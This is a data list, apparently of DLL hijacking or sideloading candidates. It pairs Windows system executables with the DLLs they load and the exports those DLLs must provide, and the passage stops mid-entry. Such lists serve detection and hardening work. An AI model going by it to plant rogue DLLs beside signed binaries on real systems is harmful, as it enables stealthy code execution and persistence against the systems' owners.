chgport.exe
netutils.dll
DllMain
:x:
chgport.exe
samcli.dll
DllMain
:x:
chgport.exe
srvcli.dll
DllMain
:x:
chgport.exe
utildll.dll
DllMain
:x:
chgport.exe
WINSTA.dll
DllMain
:x:
chkdsk.exe
DEVOBJ.dll
DllMain
:x:
chkntfs.exe
DEVOBJ.dll
DllMain
:x:
cipher.exe
DSROLE.dll
DllMain
:x:
cipher.exe
EFSUTIL.dll
DllMain
:x:
cipher.exe
FeClient.dll
DllMain
:x:
cipher.exe
iertutil.dll
DllMain
:x:
cipher.exe
NTDSAPI.dll
DllMain
:x:
cipher.exe
VAULTCLI.dll
DllMain
:x:
clipup.exe
CRYPTXML.dll
DllMain
:x:
clipup.exe
webservices.dll
DllMain
:x:
cmdl32.exe
Cabinet.dll
DllMain
:x:
cmdl32.exe
cmpbk32.dll
DllMain
:x:
cmdl32.exe
RASAPI32.dll
DllMain
:x:
cmdl32.exe
rasman.dll
DllMain
:x:
cmdl32.exe
WINHTTP.dll
DllMain
:x:
colorcpl.exe
ColorAdapterClient.dll
DllMain
:x:
colorcpl.exe
colorui.dll
DllMain
:x:
colorcpl.exe
colorui.dll
LaunchColorCpl
:x:
colorcpl.exe
IPHLPAPI.DLL
DllMain
:x:
colorcpl.exe
mscms.dll
ColorCplInitialize
:x:
colorcpl.exe
mscms.dll
ColorCplUninitialize
:x:
colorcpl.exe
mscms.dll
DllMain
:x:
colorcpl.exe
PROPSYS.dll
DllMain
:x:
colorcpl.exe
USERENV.dll
DllMain
:x:
compmgmtlauncher.exe
apphelp.dll
ApphelpCheckShellObject
:x:
compmgmtlauncher.exe
apphelp.dll
DllMain
:x:
compmgmtlauncher.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
compmgmtlauncher.exe
CLDAPI.dll
DllMain
:x:
compmgmtlauncher.exe
CRYPTBASE.dll
DllMain
:x:
compmgmtlauncher.exe
CRYPTBASE.dll
SystemFunction036
:x:
compmgmtlauncher.exe
edputil.dll
DllMain
:x:
compmgmtlauncher.exe
edputil.dll
EdpGetIsManaged
:x:
compmgmtlauncher.exe
FLTLIB.DLL
DllMain
:x:
compmgmtlauncher.exe
PROPSYS.dll
DllMain
:x:
compmgmtlauncher.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
compmgmtlauncher.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
ctfmon.exe
MsCtfMonitor.DLL
DllMain
:x:
ctfmon.exe
MsCtfMonitor.DLL
DoMsCtfMonitor
:x:
ctfmon.exe
MSUTB.dll
DllMain
:x:
ctfmon.exe
WINSTA.dll
DllMain
:x:
cttune.exe
DWrite.dll
DllMain
:x:
cttune.exe
DWrite.dll
DWriteCreateFactory
:x:
cttune.exe
OLEACC.dll
DllMain
:x:
cttune.exe
UxTheme.dll
DllMain
:x:
dataexchangehost.exe
d2d1.dll
DllMain
:x:
dataexchangehost.exe
d3d11.dll
DllMain
:x:
dataexchangehost.exe
DWrite.dll
DllMain
:x:
dataexchangehost.exe
dxgi.dll
DllMain
:x:
datausagelivetiletask.exe
dusmapi.dll
DllMain
:x:
datausagelivetiletask.exe
IPHLPAPI.DLL
DllMain
:x:
ddodiag.exe
XmlLite.dll
CreateXmlReader
:x:
ddodiag.exe
XmlLite.dll
DllMain
:x:
deploymentcsphelper.exe
dbgcore.DLL
DllMain
:x:
deploymentcsphelper.exe
DismApi.DLL
DllMain
:x:
deploymentcsphelper.exe
WDSCORE.dll
ConstructPartialMsgVW
:x:
deploymentcsphelper.exe
WDSCORE.dll
CurrentIP
:x:
deploymentcsphelper.exe
WDSCORE.dll
DllMain
:x:
deploymentcsphelper.exe
WDSCORE.dll
WdsInitialize
:x:
deploymentcsphelper.exe
WDSCORE.dll
WdsSetupLogMessageW
:x:
deploymentcsphelper.exe
WDSCORE.dll
WdsTerminate
:x:
devicecensus.exe
dcntel.dll
DllMain
:x:
devicecensus.exe
dcntel.dll
GetCensusRegistryLocation
:x:
devicecensus.exe
dcntel.dll
RunSystemContextCensus
:x:
devicecensus.exe
dcntel.dll
SetCustomTrigger
:x:
devicecensus.exe
dcntel.dll
SetCustomTriggerEx
:x:
devicecensus.exe
IPHLPAPI.DLL
DllMain
:x:
devicecensus.exe
IPHLPAPI.DLL
GetAdaptersInfo
:x:
devicecensus.exe
logoncli.dll
DllMain
:x:
devicecensus.exe
logoncli.dll
DsGetDcNameW
:x:
devicecensus.exe
netutils.dll
DllMain
:x:
devicecensus.exe
netutils.dll
NetApiBufferAllocate
:x:
devicecensus.exe
WINHTTP.dll
DllMain
:x:
devicecredentialdeployment.exe
DeviceCredential.dll
DllMain
:x:
deviceenroller.exe
DEVOBJ.dll
DllMain
:x:
deviceenroller.exe
DMCmnUtils.dll
CopyString
:x:
deviceenroller.exe
DMCmnUtils.dll
DllMain
:x:
deviceenroller.exe
dmEnrollEngine.DLL
DllMain
:x:
deviceenroller.exe
dmenterprisediagnostics.dll
DllMain
:x:
deviceenroller.exe
iri.dll
DllMain
:x:
deviceenroller.exe
netutils.dll
DllMain
:x:
deviceenroller.exe
omadmapi.dll
DllMain
:x:
deviceenroller.exe
omadmapi.dll
FreeCommandLineOptions
:x:
deviceenroller.exe
omadmapi.dll
ProcessCommandLine
:x:
deviceenroller.exe
samcli.dll
DllMain
:x:
deviceenroller.exe
USERENV.dll
DllMain
:x:
deviceenroller.exe
XmlLite.dll
DllMain
:x:
devicepairingwizard.exe
dwmapi.dll
DllMain
:x:
devicepairingwizard.exe
dwmapi.dll
DwmExtendFrameIntoClientArea
:x:
devicepairingwizard.exe
OLEACC.dll
DllMain
:x:
devicepairingwizard.exe
OLEACC.dll
GetRoleTextW
:x:
dfrgui.exe
SXSHARED.dll
DllMain
:x:
dfrgui.exe
SXSHARED.dll
SxTracerGetThreadContextRetail
:x:
dialer.exe
rtutils.dll
DllMain
:x:
dialer.exe
rtutils.dll
TraceRegisterExW
:x:
dialer.exe
rtutils.dll
TraceVprintfExA
:x:
dialer.exe
SspiCli.dll
DllMain
:x:
dialer.exe
SspiCli.dll
GetUserNameExW
:x:
dialer.exe
TAPI32.dll
DllMain
:x:
dialer.exe
TAPI32.dll
lineInitializeExW
:x:
disksnapshot.exe
CRYPTBASE.dll
DllMain
:x:
disksnapshot.exe
CRYPTBASE.dll
SystemFunction036
:x:
dispdiag.exe
DEVOBJ.dll
DevObjCreateDeviceInfoList
:x:
dispdiag.exe
DEVOBJ.dll
DevObjDestroyDeviceInfoList
:x:
dispdiag.exe
DEVOBJ.dll
DevObjGetClassDevs
:x:
dispdiag.exe
DEVOBJ.dll
DllMain
:x:
dispdiag.exe
DXVA2.dll
DllMain
:x:
dispdiag.exe
DXVA2.dll
GetNumberOfPhysicalMonitorsFromHMONITOR
:x:
dispdiag.exe
WMICLNT.dll
DllMain
:x:
dispdiag.exe
WMICLNT.dll
WmiDevInstToInstanceNameW
:x:
dispdiag.exe
WMICLNT.dll
WmiOpenBlock
:x:
displayswitch.exe
dwmapi.dll
DllMain
:x:
displayswitch.exe
policymanager.dll
DllMain
:x:
displayswitch.exe
policymanager.dll
PolicyManager_GetPolicyInt
:x:
displayswitch.exe
UxTheme.dll
DllMain
:x:
displayswitch.exe
WINSTA.dll
DllMain
:x:
djoin.exe
dbgcore.DLL
DllMain
:x:
djoin.exe
JOINUTIL.DLL
DllMain
:x:
djoin.exe
logoncli.dll
DllMain
:x:
djoin.exe
netutils.dll
DllMain
:x:
djoin.exe
netutils.dll
NetApiBufferFree
:x:
djoin.exe
wdscore.dll
ConstructPartialMsgVW
:x:
djoin.exe
wdscore.dll
CurrentIP
:x:
djoin.exe
wdscore.dll
DllMain
:x:
djoin.exe
wdscore.dll
WdsSetupLogDestroy
:x:
djoin.exe
wdscore.dll
WdsSetupLogInit
:x:
djoin.exe
wdscore.dll
WdsSetupLogMessageW
:x:
djoin.exe
wkscli.dll
DllMain
:x:
dmcertinst.exe
certenroll.dll
DllMain
:x:
dmcertinst.exe
DMCmnUtils.dll
DllMain
:x:
dmcertinst.exe
DSPARSE.dll
DllMain
:x:
dmcertinst.exe
iri.dll
DllMain
:x:
dmcertinst.exe
omadmapi.dll
DllMain
:x:
dmcertinst.exe
omadmapi.dll
ProcessCommandLine
:x:
dmcfghost.exe
DMCmnUtils.dll
DllMain
:x:
dmcfghost.exe
DMPushProxy.dll
DllMain
:x:
dmcfghost.exe
DMPushProxy.dll
PushRouter_FreeGetMessageEventName
:x:
dmcfghost.exe
DMPushProxy.dll
PushRouter_Open
:x:
dmcfghost.exe
dmxmlhelputils.dll
DllMain
:x:
dmcfghost.exe
dsclient.dll
DllMain
:x:
dmcfghost.exe
iri.dll
DllMain
:x:
dmcfghost.exe
omadmapi.dll
DllMain
:x:
dmcfghost.exe
XmlLite.dll
DllMain
:x:
dmclient.exe
WINHTTP.dll
DllMain
:x:
dmclient.exe
XmlLite.dll
DllMain
:x:
dmnotificationbroker.exe
DMCmnUtils.dll
DllMain
:x:
dmomacpmo.exe
DEVOBJ.dll
DllMain
:x:
dmomacpmo.exe
DMCmnUtils.dll
DllMain
:x:
dmomacpmo.exe
dmEnrollEngine.DLL
DllMain
:x:
dmomacpmo.exe
DMProcessXMLFiltered.dll
DllMain
:x:
dmomacpmo.exe
dsclient.dll
DllMain
:x:
dmomacpmo.exe
iri.dll
DllMain
:x:
dmomacpmo.exe
omadmapi.dll
DllMain
:x:
dmomacpmo.exe
omadmapi.dll
ProcessCommandLine
:x:
dmomacpmo.exe
USERENV.dll
DllMain
:x:
dmomacpmo.exe
XmlLite.dll
DllMain
:x:
dnscacheugc.exe
dbgcore.DLL
DllMain
:x:
dnscacheugc.exe
IPHLPAPI.DLL
DllMain
:x:
dnscacheugc.exe
wdscore.dll
ConstructPartialMsgVW
:x:
dnscacheugc.exe
wdscore.dll
CurrentIP
:x:
dnscacheugc.exe
wdscore.dll
DllMain
:x:
dnscacheugc.exe
wdscore.dll
WdsSetupLogDestroy
:x:
dnscacheugc.exe
wdscore.dll
WdsSetupLogInit
:x:
dnscacheugc.exe
wdscore.dll
WdsSetupLogMessageW
:x:
dpapimig.exe
netutils.dll
DllMain
:x:
dpapimig.exe
netutils.dll
NetApiBufferFree
:x:
dpapimig.exe
samcli.dll
DllMain
:x:
dpapimig.exe
samcli.dll
NetUserModalsGet
:x:
dpapimig.exe
SAMLIB.dll
DllMain
:x:
dpapimig.exe
SAMLIB.dll
SamConnect
:x:
dpapimig.exe
SAMLIB.dll
SamEnumerateDomainsInSamServer
:x:
dpapimig.exe
SAMLIB.dll
SamFreeMemory
:x:
dpiscaling.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
dpiscaling.exe
CLDAPI.dll
DllMain
:x:
dpiscaling.exe
CRYPTBASE.DLL
DllMain
:x:
dpiscaling.exe
edputil.dll
DllMain
:x:
dpiscaling.exe
edputil.dll
EdpGetIsManaged
:x:
dpiscaling.exe
FLTLIB.DLL
DllMain
:x:
dpiscaling.exe
PROPSYS.dll
DllMain
:x:
dpiscaling.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
dpiscaling.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
driverquery.exe
netutils.dll
DllMain
:x:
driverquery.exe
srvcli.dll
DllMain
:x:
driverquery.exe
SspiCli.dll
DllMain
:x:
drvinst.exe
DEVOBJ.dll
DllMain
:x:
drvinst.exe
DEVRTL.dll
DllMain
:x:
dsregcmd.exe
dsreg.dll
DllMain
:x:
dsregcmd.exe
logoncli.dll
DllMain
:x:
dsregcmd.exe
netutils.dll
DllMain
:x:
dsregcmd.exe
PROPSYS.dll
DllMain
:x:
dsregcmd.exe
SSPICLI.DLL
DllMain
:x:
dsregcmd.exe
USERENV.dll
DllMain
:x:
dsregcmd.exe
WINHTTP.dll
DllMain
:x:
dsregcmd.exe
WININET.dll
DllMain
:x:
dsregcmd.exe
wkscli.dll
DllMain
:x:
dstokenclean.exe
dsclient.dll
DllMain
:x:
dstokenclean.exe
dsclient.dll
DSRemoveExpiredTokens
:x:
dwm.exe
CoreMessaging.dll
DllMain
:x:
dwm.exe
d2d1.dll
DllMain
:x:
dwm.exe
d3d11.dll
DllMain
:x:
dwm.exe
D3DCOMPILER_47.dll
DllMain
:x:
dwm.exe
dwmcore.dll
DllMain
:x:
dwm.exe
dxgi.dll
DllMain
:x:
dwm.exe
dxgi.dll
DXGIDeclareAdapterRemovalSupport
:x:
dwwin.exe
wer.dll
DllMain
:x:
dxgiadaptercache.exe
d3d11.dll
DllMain
:x:
dxgiadaptercache.exe
d3d12.dll
DllMain
:x:
dxgiadaptercache.exe
dxgi.dll
DllMain
:x:
dxpserver.exe
dwmapi.dll
DllMain
:x:
dxpserver.exe
msi.dll
DllMain
:x:
dxpserver.exe
PROPSYS.dll
DllMain
:x:
dxpserver.exe
XmlLite.dll
DllMain
:x:
easeofaccessdialog.exe
OLEACC.dll
DllMain
:x:
edpcleanup.exe
DMCmnUtils.dll
DllMain
:x:
edpcleanup.exe
DNSAPI.dll
DllMain
:x:
edpcleanup.exe
FirewallAPI.dll
DllMain
:x:
edpcleanup.exe
fwbase.dll
DllMain
:x:
edpcleanup.exe
fwbase.dll
FwCriticalSectionCreate
:x:
edpcleanup.exe
fwbase.dll
FwCriticalSectionDestroy
:x:
edpcleanup.exe
netutils.dll
DllMain
:x:
edpcleanup.exe
policymanager.dll
DllMain
:x:
edpcleanup.exe
SspiCli.dll
DllMain
:x:
edpcleanup.exe
wkscli.dll
DllMain
:x:
eduprintprov.exe
deviceassociation.dll
DllMain
:x:
eduprintprov.exe
policymanager.dll
DllMain
:x:
eduprintprov.exe
policymanager.dll
PolicyManager_GetPolicy
:x:
eduprintprov.exe
SspiCli.dll
DllMain
:x:
eduprintprov.exe
SspiCli.dll
GetUserNameExW
:x:
efsui.exe
credui.dll
DllMain
:x:
efsui.exe
CRYPTBASE.DLL
DllMain
:x:
efsui.exe
CRYPTUI.dll
DllMain
:x:
efsui.exe
DSROLE.dll
DllMain
:x:
efsui.exe
EFSADU.dll
DllMain
:x:
efsui.exe
EFSUTIL.dll
DllMain
:x:
efsui.exe
FeClient.dll
DllMain
:x:
efsui.exe
logoncli.dll
DllMain
:x:
efsui.exe
netutils.dll
DllMain
:x:
efsui.exe
USERENV.dll
DllMain
:x:
efsui.exe
VAULTCLI.dll
DllMain
:x:
ehstorauthn.exe
UxTheme.dll
DllMain
:x:
esentutl.exe
ESENT.dll
DllMain
:x:
eventcreate.exe
netutils.dll
DllMain
:x:
eventcreate.exe
srvcli.dll
DllMain
:x:
eventcreate.exe
SspiCli.dll
DllMain
:x:
expand.exe
Cabinet.dll
DllMain
:x:
extrac32.exe
Cabinet.dll
DllMain
:x:
fhmanagew.exe
fhsvcctl.dll
DllMain
:x:
filehistory.exe
CRYPTBASE.dll
DllMain
:x:
filehistory.exe
CRYPTBASE.dll
SystemFunction036
:x:
filehistory.exe
UxTheme.dll
DllMain
:x:
filehistory.exe
UxTheme.dll
EnableThemeDialogTexture
:x:
filehistory.exe
UxTheme.dll
OpenThemeData
:x:
fixmapi.exe
mapistub.dll
DllMain
:x:
fixmapi.exe
mapistub.dll
FixMAPI
:x:
fltmc.exe
FLTLIB.DLL
DllMain
:x:
fltmc.exe
FLTLIB.DLL
FilterFindFirst
:x:
fltmc.exe
FLTLIB.DLL
FilterFindNext
:x:
fondue.exe
msi.dll
DllMain
:x:
fondue.exe
osbaseln.dll
DllMain
:x:
fondue.exe
PROPSYS.dll
DllMain
:x:
fsiso.exe
iumbase.DLL
DllMain
:x:
fsquirt.exe
DEVOBJ.dll
DevObjCreateDeviceInfoList
:x:
fsquirt.exe
DEVOBJ.dll
DevObjDestroyDeviceInfoList
:x:
fsquirt.exe
DEVOBJ.dll
DevObjGetClassDevs
:x:
fsquirt.exe
DEVOBJ.dll
DllMain
:x:
fsquirt.exe
dwmapi.dll
DllMain
:x:
fsquirt.exe
dwmapi.dll
DwmExtendFrameIntoClientArea
:x:
fsquirt.exe
OLEACC.dll
DllMain
:x:
fsquirt.exe
OLEACC.dll
GetRoleTextW
:x:
ftp.exe
SspiCli.dll
DllMain
:x:
fvenotify.exe
FVEAPI.dll
DllMain
:x:
fvenotify.exe
FVEAPI.dll
FveFindFirstVolume
:x:
fvenotify.exe
FVEAPI.dll
FveFindNextVolume
:x:
fvenotify.exe
FVEAPI.dll
FveGetStatus
:x:
fvenotify.exe
FVEAPI.dll
FveGetVolumeNameW
:x:
fvenotify.exe
FVEAPI.dll
FveIsVolumeEncryptable
:x:
fvenotify.exe
FVEAPI.dll
FveOpenVolumeByHandle
:x:
fvenotify.exe
FVEAPI.dll
FveOpenVolumeW
:x:
fveprompt.exe
FVEAPI.dll
DllMain
:x:
fxscover.exe
IPHLPAPI.DLL
DllMain
:x:
fxscover.exe
IPHLPAPI.DLL
GetAdaptersAddresses
:x:
fxssvc.exe
credui.dll
DllMain
:x:
fxssvc.exe
FXSTIFF.dll
DllMain
:x:
fxssvc.exe
IPHLPAPI.DLL
DllMain
:x:
fxssvc.exe
PROPSYS.dll
DllMain
:x:
fxssvc.exe
TAPI32.dll
DllMain
:x:
gamepanel.exe
d2d1.dll
DllMain
:x:
gamepanel.exe
d3d11.dll
DllMain
:x:
gamepanel.exe
dcomp.dll
DllMain
:x:
gamepanel.exe
dwmapi.dll
DllMain
:x:
gamepanel.exe
dwmapi.dll
DwmSetWindowAttribute
:x:
gamepanel.exe
DWrite.dll
DllMain
:x:
gamepanel.exe
DWrite.dll
DWriteCreateFactory
:x:
gamepanel.exe
dxgi.dll
CreateDXGIFactory2
:x:
gamepanel.exe
dxgi.dll
DllMain
:x:
gamepanel.exe
msdrm.dll
DllMain
:x:
gamepanel.exe
UIAutomationCore.DLL
DllMain
:x:
gamepanel.exe
UxTheme.dll
DllMain
:x:
gamepanel.exe
UxTheme.dll
EnableThemeDialogTexture
:x:
gamepanel.exe
UxTheme.dll
OpenThemeData
:x:
genvalobj.exe
bcd.dll
DllMain
:x:
getmac.exe
netutils.dll
DllMain
:x:
getmac.exe
srvcli.dll
DllMain
:x:
getmac.exe
SspiCli.dll
DllMain
:x:
getmac.exe
wkscli.dll
DllMain
:x:
gpresult.exe
logoncli.dll
DllMain
:x:
gpresult.exe
netutils.dll
DllMain
:x:
gpresult.exe
NTDSAPI.dll
DllMain
:x:
gpresult.exe
Secur32.dll
DllMain
:x:
gpresult.exe
srvcli.dll
DllMain
:x:
gpresult.exe
SspiCli.dll
DllMain
:x:
gpupdate.exe
USERENV.dll
DllMain
:x:
gpupdate.exe
wevtapi.dll
DllMain
:x:
hvax64.exe
KDSTUB.dll
DllMain
:x:
hvix64.exe
KDSTUB.dll
DllMain
:x:
hvsievaluator.exe
DismApi.DLL
DllMain
:x:
hvsievaluator.exe
DMCmnUtils.dll
DllMain
:x:
hvsievaluator.exe
iri.dll
DllMain
:x:
hvsievaluator.exe
omadmapi.dll
DllMain
:x:
hvsievaluator.exe
policymanager.dll
DllMain
:x:
hvsievaluator.exe
policymanager.dll
PolicyManager_GetPolicyInt
:x:
ie4uinit.exe
CRYPTBASE.DLL
DllMain
:x:
ie4uinit.exe
IEADVPACK.dll
DllMain
:x:
ie4uinit.exe
iedkcs32.dll
DllMain
:x:
ie4uinit.exe
MLANG.dll
DllMain
:x:
ie4uinit.exe
netutils.dll
DllMain
:x:
ie4uinit.exe
WININET.dll
DllMain
:x:
ie4uinit.exe
wkscli.dll
DllMain
:x:
ieunatt.exe
dbgcore.DLL
DllMain
:x:
klist.exe
secur32.dll
DllMain
:x:
ksetup.exe
logoncli.dll
DllMain
:x:
ksetup.exe
netutils.dll
DllMain
:x:
ksetup.exe
srvcli.dll
DllMain
:x:
ksetup.exe
SspiCli.dll
DllMain
:x:
label.exe
DEVOBJ.dll
DllMain
:x:
licensingdiag.exe
Cabinet.dll
DllMain
:x:
licensingdiag.exe
Cabinet.dll
FCICreate
:x:
licensingdiag.exe
CLIPC.dll
ClipGatherDiagnostics
:x:
licensingdiag.exe
CLIPC.dll
ClipGenerateDeviceLicenseRequest
:x:
licensingdiag.exe
CLIPC.dll
ClipGetLicenseAndPolicyForPfn
:x:
licensingdiag.exe
CLIPC.dll
ClipOpen
:x:
licensingdiag.exe
CLIPC.dll
DllMain
:x:
lockscreencontentserver.exe
dwmapi.dll
DllMain
:x:
lpksetup.exe
CRYPTBASE.dll
DllMain
:x:
lpksetup.exe
CRYPTBASE.dll
SystemFunction036
:x:
lpksetup.exe
dpx.dll
DllMain
:x:
lpremove.exe
AppXAllUserStore.dll
DllMain
:x:
lpremove.exe
AppXAllUserStore.dll
IsNonInboxAllUserPackage
:x:
lpremove.exe
AppXDeploymentClient.dll
DllMain
:x:
lpremove.exe
Bcp47Langs.dll
Bcp47GetMuiForm
:x:
lpremove.exe
Bcp47Langs.dll
DllMain
:x:
lpremove.exe
Bcp47Langs.dll
GetUserLanguagesForUser
:x:
lpremove.exe
DNSAPI.dll
DllMain
:x:
lpremove.exe
FirewallAPI.dll
DllMain
:x:
lpremove.exe
fwbase.dll
DllMain
:x:
lpremove.exe
fwbase.dll
FwCriticalSectionCreate
:x:
lpremove.exe
fwbase.dll
FwCriticalSectionDestroy
:x:
lpremove.exe
StateRepository.Core.dll
DllMain
:x:
magnify.exe
d3d9.dll
DllMain
:x:
magnify.exe
MAGNIFICATION.dll
DllMain
:x:
magnify.exe
MAGNIFICATION.dll
MagInitialize
:x:
magnify.exe
MAGNIFICATION.dll
MagSetFullscreenTransform
:x:
magnify.exe
MAGNIFICATION.dll
MagSetFullscreenUseBitmapSmoothing
:x:
magnify.exe
MAGNIFICATION.dll
MagSetInputTransform
:x:
magnify.exe
MAGNIFICATION.dll
MagShowSystemCursor
:x:
magnify.exe
MAGNIFICATION.dll
MagUninitialize
:x:
magnify.exe
OLEACC.dll
DllMain
:x:
magnify.exe
UIAutomationCore.DLL
DllMain
:x:
magnify.exe
WTSAPI32.dll
DllMain
:x:
makecab.exe
Cabinet.dll
DllMain
:x:
mcbuilder.exe
bcp47mrm.dll
DllMain
:x:
mcbuilder.exe
bcp47mrm.dll
IsWellFormedTag
:x:
mcbuilder.exe
mrmcoreR.dll
DllMain
:x:
mcbuilder.exe
mrmcoreR.dll
MergeSystemPriFiles
:x:
mdeserver.exe
d3d11.dll
DllMain
:x:
mdeserver.exe
dxgi.dll
DllMain
:x:
mdeserver.exe
MFPlat.DLL
DllMain
:x:
mdeserver.exe
MFPlat.DLL
MFStartup
:x:
mdeserver.exe
RTWorkQ.DLL
DllMain
:x:
mdeserver.exe
RTWorkQ.DLL
RtwqRegisterPlatformEvents
:x:
mdeserver.exe
RTWorkQ.DLL
RtwqStartup
:x:
mdeserver.exe
SspiCli.dll
DllMain
:x:
mdeserver.exe
winmde.dll
DllMain
:x:
mdmappinstaller.exe
DEVOBJ.dll
DllMain
:x:
mdmappinstaller.exe
DMCmnUtils.dll
DllMain
:x:
mdmappinstaller.exe
dmEnrollEngine.DLL
DllMain
:x:
mdmappinstaller.exe
iri.dll
DllMain
:x:
mdmappinstaller.exe
msi.dll
DllMain
:x:
mdmappinstaller.exe
omadmapi.dll
DllMain
:x:
mdmappinstaller.exe
USERENV.dll
DllMain
:x:
mdmappinstaller.exe
WTSAPI32.dll
DllMain
:x:
mdmdiagnosticstool.exe
DEVOBJ.dll
DllMain
:x:
mdmdiagnosticstool.exe
DMCmnUtils.dll
DllMain
:x:
mdmdiagnosticstool.exe
dmEnrollEngine.DLL
DllMain
:x:
mdmdiagnosticstool.exe
dmiso8601utils.dll
DllMain
:x:
mdmdiagnosticstool.exe
DynamoAPI.dll
DllMain
:x:
mdmdiagnosticstool.exe
iri.dll
DllMain
:x:
mdmdiagnosticstool.exe
MdmDiagnostics.dll
DllMain
:x:
mdmdiagnosticstool.exe
omadmapi.dll
DllMain
:x:
mdmdiagnosticstool.exe
policymanager.dll
DllMain
:x:
mdmdiagnosticstool.exe
tbs.dll
DllMain
:x:
mdmdiagnosticstool.exe
USERENV.dll
DllMain
:x:
mdmdiagnosticstool.exe
WINHTTP.dll
DllMain
:x:
mdmdiagnosticstool.exe
WININET.dll
DllMain
:x:
mdmdiagnosticstool.exe
XmlLite.dll
DllMain
:x:
mfpmp.exe
CRYPTBASE.DLL
DllMain
:x:
mfpmp.exe
ksuser.dll
DllMain
:x:
mfpmp.exe
MFCORE.dll
DllMain
:x:
mfpmp.exe
MFPlat.DLL
DllMain
:x:
mfpmp.exe
MFPlat.DLL
MFGetCallStackTracingWeakReference
:x:
mfpmp.exe
MFPlat.DLL
MFShutdown
:x:
mfpmp.exe
RTWorkQ.DLL
DllMain
:x:
mfpmp.exe
RTWorkQ.DLL
RtwqRegisterPlatformEvents
:x:
mfpmp.exe
RTWorkQ.DLL
RtwqShutdown
:x:
microsoft.uev.cscunpintool.exe
CSCAPI.dll
DllMain
:x:
microsoft.uev.cscunpintool.exe
CSCAPI.dll
OfflineFilesQueryStatus
:x:
microsoftedgebchost.exe
iertutil.dll
DllMain
:x:
microsoftedgebchost.exe
USERENV.dll
DllMain
:x:
microsoftedgecp.exe
iertutil.dll
DllMain
:x:
microsoftedgecp.exe
USERENV.dll
DllMain
:x:
microsoftedgedevtools.exe
iertutil.dll
DllMain
:x:
microsoftedgesh.exe
USERENV.dll
DllMain
:x:
microsoftedgesh.exe
USERENV.dll
GetAppContainerRegistryLocation
:x:
mobsync.exe
edputil.dll
DllMain
:x:
mobsync.exe
edputil.dll
EdpGetIsManaged
:x:
mobsync.exe
PROPSYS.dll
DllMain
:x:
mobsync.exe
PROPSYS.dll
PSGetNameFromPropertyKey
:x:
mobsync.exe
PROPSYS.dll
PSStringFromPropertyKey
:x:
mobsync.exe
PROPSYS.dll
VariantToString
:x:
mousocoreworker.exe
winsqlite3.dll
DllMain
:x:
msdt.exe
ATL.DLL
DllMain
:x:
msdt.exe
Cabinet.dll
DllMain
:x:
msdt.exe
SSPICLI.DLL
DllMain
:x:
msdt.exe
SSPICLI.DLL
GetUserNameExW
:x:
msdt.exe
UxTheme.dll
DllMain
:x:
msdt.exe
wer.dll
DllMain
:x:
msdt.exe
WINHTTP.dll
DllMain
:x:
msdtc.exe
CLUSAPI.dll
DllMain
:x:
msdtc.exe
DNSAPI.dll
DllMain
:x:
msdtc.exe
ktmw32.dll
DllMain
:x:
msdtc.exe
MSDTCTM.dll
DllMain
:x:
msdtc.exe
MSDTCTM.dll
DtcMainExt
:x:
msdtc.exe
MTXCLU.DLL
DllMain
:x:
msdtc.exe
RESUTILS.dll
DllMain
:x:
msdtc.exe
XOLEHLP.dll
DllMain
:x:
msg.exe
WINSTA.dll
DllMain
:x:
mshta.exe
CRYPTBASE.DLL
DllMain
:x:
mshta.exe
netutils.dll
DllMain
:x:
mshta.exe
srpapi.dll
DllMain
:x:
mshta.exe
srpapi.dll
SrpGetEnterpriseIds
:x:
mshta.exe
SspiCli.dll
DllMain
:x:
mshta.exe
SspiCli.dll
GetUserNameExW
:x:
mshta.exe
WINHTTP.dll
DllMain
:x:
mshta.exe
wkscli.dll
DllMain
:x:
mshta.exe
WLDP.DLL
DllMain
:x:
mshta.exe
WLDP.DLL
WldpGetLockdownPolicy
:x:
msiexec.exe
msi.dll
DllMain
:x:
msiexec.exe
msi.dll
MsiLoadStringW
:x:
msiexec.exe
msi.dll
MsiMessageBoxExW
:x:
msinfo32.exe
ATL.DLL
DllMain
:x:
msinfo32.exe
SLC.dll
DllMain
:x:
msinfo32.exe
sppc.dll
DllMain
:x:
mspaint.exe
MSFTEDIT.DLL
DllMain
:x:
mspaint.exe
PROPSYS.dll
DllMain
:x:
msra.exe
IPHLPAPI.DLL
DllMain
:x:
msra.exe
IPHLPAPI.DLL
GetAdaptersAddresses
:x:
msra.exe
IPHLPAPI.DLL
NotifyUnicastIpAddressChange
:x:
msra.exe
NDFAPI.DLL
DllMain
:x:
msra.exe
SspiCli.dll
DllMain
:x:
msra.exe
SspiCli.dll
GetUserNameExA
:x:
msra.exe
SspiCli.dll
GetUserNameExW
:x:
msra.exe
USERENV.dll
DllMain
:x:
msra.exe
USERENV.dll
GetProfileType
:x:
msra.exe
UxTheme.dll
DllMain
:x:
msra.exe
UxTheme.dll
IsAppThemed
:x:
msra.exe
UxTheme.dll
IsThemeActive
:x:
msra.exe
UxTheme.dll
OpenThemeData
:x:
msra.exe
wdi.dll
DllMain
:x:
mstsc.exe
credui.dll
DllMain
:x:
mstsc.exe
CRYPTBASE.DLL
DllMain
:x:
mstsc.exe
CRYPTUI.dll
DllMain
:x:
mstsc.exe
IPHLPAPI.DLL
DllMain
:x:
mstsc.exe
ktmw32.dll
DllMain
:x:
mstsc.exe
NETUTILS.DLL
DllMain
:x:
mstsc.exe
SSPICLI.DLL
DllMain
:x:
mstsc.exe
WINHTTP.dll
DllMain
:x:
mstsc.exe
WININET.dll
DllMain
:x:
mstsc.exe
WKSCLI.DLL
DllMain
:x:
mtstocom.exe
SspiCli.dll
DllMain
:x:
muiunattend.exe
dbgcore.DLL
DllMain
:x:
muiunattend.exe
SspiCli.dll
DllMain
:x:
muiunattend.exe
wdscore.dll
ConstructPartialMsgVW
:x:
muiunattend.exe
wdscore.dll
CurrentIP
:x:
muiunattend.exe
wdscore.dll
DllMain
:x:
muiunattend.exe
wdscore.dll
WdsSetupLogInit
:x:
muiunattend.exe
wdscore.dll
WdsSetupLogMessageW
:x:
musnotification.exe
Cabinet.dll
DllMain
:x:
musnotification.exe
UpdatePolicy.dll
DllMain
:x:
musnotification.exe
UPShared.dll
DllMain
:x:
musnotification.exe
USERENV.dll
DllMain
:x:
musnotification.exe
WINHTTP.dll
DllMain
:x:
musnotification.exe
WINSTA.dll
DllMain
:x:
musnotification.exe
WINSTA.dll
